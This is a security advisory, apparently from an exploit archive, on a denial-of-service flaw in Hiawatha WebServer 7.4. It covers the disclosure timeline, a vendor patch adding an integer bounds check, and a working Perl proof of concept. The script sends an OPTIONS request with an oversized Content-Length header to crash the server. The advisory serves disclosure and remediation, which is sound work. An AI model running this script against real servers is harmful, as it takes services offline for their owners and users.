Hiawatha WebServer version 7.4 suffers from a denial of service vulnerability.
80318ee6a80e3cdf8451955911b1bdd5b63a92301b713132026bb94ed35fbc6b
[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):
[Software]
- Hiawatha WebServer 7.4
[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.
- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz
[Advisory Timeline]
- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.
[Bug Summary]
- Content-Length entity-header filed miscalculation.
[Impact]
- Low
[Affected Version]
- 7.4
- Prior versions can also be affected but weren't tested.
[Bug Description and Proof of Concept]
- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.
[PoC]
# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "OPTIONS * HTTP/1.1\r\n";
print $socket "Host: http://www.dclabs.com.br\r\n";
print $socket "Content-Length: 2147483599\r\n\r\n";
sleep(3);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br
[Patch(s) / Workaround]
-- hiawatha.c --
-- BEGIN --
20a21
> #include <limits.h>
421c422
< if
(content_length < 0) {
---
> if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --
[Greetz]
DcLabs Security Research Group.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br